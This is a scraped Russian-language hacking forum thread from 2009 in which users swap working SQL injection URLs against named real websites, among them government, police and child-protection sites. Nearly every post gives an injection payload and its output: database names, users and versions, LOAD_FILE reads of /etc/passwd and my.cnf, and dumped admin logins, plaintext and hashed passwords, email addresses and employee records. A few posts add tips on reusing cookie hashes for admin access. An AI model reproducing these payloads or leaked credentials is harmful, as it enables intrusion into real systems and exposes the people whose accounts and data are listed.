SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.bancuri.biz/bancuri.php?id_categ=-111+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3--

    Version: 5.0.51a-log
    Database: :bancuri_biz_bd
    User :mica@192.168.88.2



    http://bancuri.biz/admin
    User: Adrian
    Pass: 111222

    read /etc/passwd

    http://www.bancuri.biz/bancuri.php?id_categ=-111+UNION+SELECT+1,LOAD_FILE(0x2F6574632F706173737764),3--
     
  2. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    http://www.photo-kazan.ru

    http://www.photo-kazan.ru/gallery/summer.html?users_id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(version(),0x3a,database()),user(),16,17,18+from+admin_groups+--+

    юзер - photokazan_site@localhost
    бд - photokazan_site
    версия бд - 5.0.67-community-log


    http://www.photo-kazan.ru/gallery/summer.html?users_id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,id,login,pass),15,16,17,18+from+admin_groups+--+

    логин админа - admin
    пароль - 123 =))))))

    вот админка - http://www.photo-kazan.ru/admin

    P.S. КАКОЙ ПРИДУРОК ЗАДЕФЕЙСИЛ САЙТ? ОБРАЩАЮСЬ К ПРИДУРКУ ЗАДЕФЕЙСИВШЕМУ САЙТ:
    ВО ПЕРВЫХ ЭТО ТВОЙ САЙТ, ЧТО БЫ НАД НИМ ТАК ИЗДЕВАТЬСЯ?
    ВО ВТОРЫХ ПОДПИСЫВАТЬСЯ HACKED BY X-@fqan ! ЗАХОДЯ С АККАУНТА АДМИНА ЭТО ПРОСТО СМЕШНО) ТЕМ БОЛЕЕ УЯЗВИМОСТЬ НАШЕЛ НЕ ТЫ.
    В ТРЕТЬИХ НА АНТИЧАТЕ СОВСЕМ НЕ ОДОБРЯТЬСЯ ДЕФЕЙСИТЬ САЙТЫ!!!
    В ЧЕТВЕРТЫХ Я НЕ ВЗЛАМЫВАЛ ЭТОТ САЙТ, А НАШЕЛ УЯЗВИМОСТЬ!
     
    #7582 pinky07, 4 Feb 2009
    Last edited: 5 Feb 2009
  3. BloodyMessage

    BloodyMessage Elder - Старейшина

    Joined:
    20 Aug 2006
    Messages:
    190
    Likes Received:
    41
    Reputations:
    11
    PR3

    alex:946d20c91f154795805cebdefe919ef7 alex1

    Database Version: 4.1.22-standard
    Database name: recentne_recent2
    User name: recentne_recentn@localhost
     
    #7583 BloodyMessage, 4 Feb 2009
    Last edited: 4 Feb 2009
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.protectiacopilului6.ro/document.php?doc=-19+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9--

    Version: 5.0.51a-log
    Database: protectiacopilului6_ro_db
    User:dgaspc6@192.168.88.2



    Read my.cnf, also can read /etc/passwd

    http://www.protectiacopilului6.ro/document.php?doc=-19+UNION+SELECT+1,2,LOAD_FILE(0x2F6574632F6D792E636E66),4,5,6,7,8,9--
     
    4 people like this.
  5. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    http://takafol.ru/news.php?g=0+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6+--+;&page=5

    бд - db_takafol
    юзер - takafol@localhost
    версия бд - 4.0.23-standard


    http://www.eurasica.ru/articles/-kazakh'+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+/

    бд - kyrgyz2_eurasica
    юзер - kyrgyz2_eurasica@localhost
    версия бд - 4.1.22-log
     
    #7585 pinky07, 5 Feb 2009
    Last edited: 5 Feb 2009
  6. BloodyMessage

    BloodyMessage Elder - Старейшина

    Joined:
    20 Aug 2006
    Messages:
    190
    Likes Received:
    41
    Reputations:
    11
    rp3

    Database Version: 5.0.45
    Database name: endeva
    User name: tom@localhost


    Из базы можно вытянуть пароли из базы bebeamour (www.bebeamour.co.uk - pr3):
    bebeamor:dream13dust


    из базы e107: (e107.org - PR7 2002 г)
    administrator:a2259f7acbf0b601de00543ccb59ef6e
    Админку можно найти введя в поиск сайта "administrator"
    В куках пасс md5(md5(pass)), значит a2259f7acbf0b601de00543ccb59ef6e превращаем в 80636326bb61acaa05911fc3bc1458ca, добавим ID и... в общем это только при поверхностном просмотре, а так сами копайте.


    и на последок:
    Database Version: 4.1.21-log
    Database name: cheapelectric
    User name: cheap@localhost

    http://www.stand4av.co.uk/login.php

    немного расшифрованных пассов...
    greg:jimi55
    del:eminem
    Paull:123456
    blaise:summer
    mjaggard:philip
     
    3 people like this.
  7. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Database Version: 5.0.45-log
    Database name: smarterguys_cms
    User name: smarterguys_cms@192.168.0.64


    : timmd909 : clocke : tim@timmd909.dyndns.org
    : maxx : gramax : mitchell@smarterguys.com


    Database Version:4.1.22-log
    User name:bq83845zb3@localhost
    Database name:heerys_live


    Database Version:4.1.22-max-log
    User name:scottjking@208.109.78.133
    Database name:scottjking


    Database Version: 5.0.51a-community
    Database name: ddc_ddcnyccomdev
    User name: ddc_ddc@localhost


    Database Version: 4.1.14
    Database name: CPublications
    User name: siddhaji@localhost
     
    #7587 spherics, 5 Feb 2009
    Last edited: 5 Feb 2009
    2 people like this.
  8. BloodyMessage

    BloodyMessage Elder - Старейшина

    Joined:
    20 Aug 2006
    Messages:
    190
    Likes Received:
    41
    Reputations:
    11
    PR4

    Database Version: 5.0.51a-3ubuntu5.1
    Database name: cms_data
    User name: cms_data@localhost

    debian-sys-maint:BB5CBC11A4D20B437E36051F151BA57BAD97B3BF
    admin:627EAE5E81037806F9DE339F02C9C85D10371D51
    pma_wOLLhjqYnwwF:B7DF9030E224B44878D02C2BDA5288F815DA29AF
    horde:92F55D68BBED49E0DF482D437351073D52189ACD
    cms_data:52F22AAB2B081A315B8A05AAD32623B56C19962B
     
  9. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Еще одна компания сильная...

    Database Version: 5.0.51a-log
    Database name: dicksondata_content
    User name: dicksondata@10.1.1.42


    :admin:34f816b089d7f7a6348b51bdc3290d6e : admin@tablexi.com
    :test:098f6bcd4621d373cade4e832627b4f6 : lucas2@tablexi.com хэш MD5 : 098f6bcd4621d373cade4e832627b4f6 : test
    :mlineen:0c6b9675c57f02bac9ecbe87f8e0f07b : matt@tablexi.com
    :dan1:b3fd72d19e3a844c7654951596467521 : dan@tablexi.com
    :abel:ebdada7950078902a3d35860d9d0952d : agborlongan@hotmail.com


    И так 41 тыщщщааа -)
     
    2 people like this.
  10. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Эх тока четвертые версии =)
    Code:
    http://www.itapoa.sc.gov.br/preg.php?cat=-1%20union%20select%201,2,3,version(),5,6,7,8%20--
    Code:
    http://www.vniispk.ru/apple.php?key=-1%20union%20select%201,2,3,version(),5--
     
    1 person likes this.
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Code:
    http://phillygaycalendar.com/pages/col.php?id=-293+union+select+1,2,3,4,version(),6,7,8/*
    4.0.27-max-log

    PR: 4
     
    _________________________
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.cultura2007.ro/document.php?doc=-3+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9/*


    Database Version: 5.0.22-community-nt
    Database name: cultura2007-ro
    User name: root@localhost
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Code:
    http://www.pev-geneve.ch/pages/col.php?id=-82+union+select+1,2,3,4,5,6,7,8,version()/*
    4.1.22-standard
     
    _________________________
    1 person likes this.
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.media-desk.ro/document.php?doc=-9+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*


    Database Version: 5.0.22-community-nt
    Database name: mediadesk_ro
    User name: root@localhost
     
    1 person likes this.
  15. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Ипотека
    www.vrx.ru
    Тиц: 1300
    PR: 4

    Полная информация о сотрудниках, начиная от логина/пасса на сайте, заканчивая домашним телом:
    Code:
    http://www.vrx.ru/ipoteka/bank.php?id=-8+union+select+1,concat_ws(0x3a,ID,DATE_REG,IPADRESS,AGENT,AGENT_TYPE,IDFIRM,LOGIN,PASS,MAILS,MAIL_PUBLIC,PHONE_AGENT,CONTACT_AGENT,BIRTHDAY,POL,IDSTATUS,ABOUT,OPEN,ACTIV_CODE),3,4,5,6,7,8,9,10,11+from+users--
    Code:
    http://www.vrx.ru/ipoteka/bank.php?id=-8+union+select+1,concat_ws(0x3a,ID,NAME,MAILS,LOG,PASS,PHONE,ADR,FIRM,STATUS,JOB,THEMES),3,4,5,6,7,8,9,10,11+from+v_users--
    Админка:admin/ не доступна...
     
    2 people like this.
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.politia6.ro/document.php?doc=-240+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9--


    Database Version: 5.0.67-log
    Database name: politia6_db
    User name: polcom6@208.113.189.79
     
  17. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Аудиторська Фірма СЕНТАН
    www.audit.uz.ua
    Тиц:1400
    PR:4
    Code:
    http://www.audit.uz.ua/ukr/news.php?id=-4+union+select+1,2,concat_ws(0x3a,id,name_i,login_i,password_i,email,is_admin,uid,applied),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+usrs--
    логин/пасс:
    Code:
    admin:230178
    -------------------------------------------
    The End!
     
    #7597 -m0rgan-, 5 Feb 2009
    Last edited: 5 Feb 2009
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.inforom-cultural.org/hermann/document.php?doc=-3+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,version(),database(),user()),0x71),0x71),4,5,6,7,8,9



    Database Version: 4.1.18-nt
    Database name: hermann_ro
    User name: hermann@localhost
     
  19. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    PageRank: 4

    http://www.inportdover.com/ssm/shop/view_c.php?c_id=-18+union+select+1,group_concat(user_login,0x3a,user_pass),3+from+users--

    admin:21232f297a57a5a743894a0e4a801fc3:admin

    Database Version: 5.0.32-Debian_7etch8-log
    Database name: inportdover_ssm
    User name: inportdover_web@localhost
     
    #7599 Octave_Parango, 5 Feb 2009
    Last edited by a moderator: 5 Feb 2009
    1 person likes this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    http://www.housexpert.ro/document.php?doc=-492+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9


    Database Version: 5.0.67-log
    Database name: housexpert_basic
    User name: danco@goober.dreamhost.com



    http://www.housexpert.ro/document.php?doc=-492+UNION+SELECT+1,2,CONCAT_WS(0x3a,id,name,username,email,password),4,5,6,7,8,9+FROM+hass.jos_users

    62:Administrator:admin:daniel.ionescu@hass.ro:8dfd8ac0990c9d9f3e2c7f833121aaef

    pass: creation

    admin panel - not found.
     
Loading...
Thread Status:
Not open for further replies.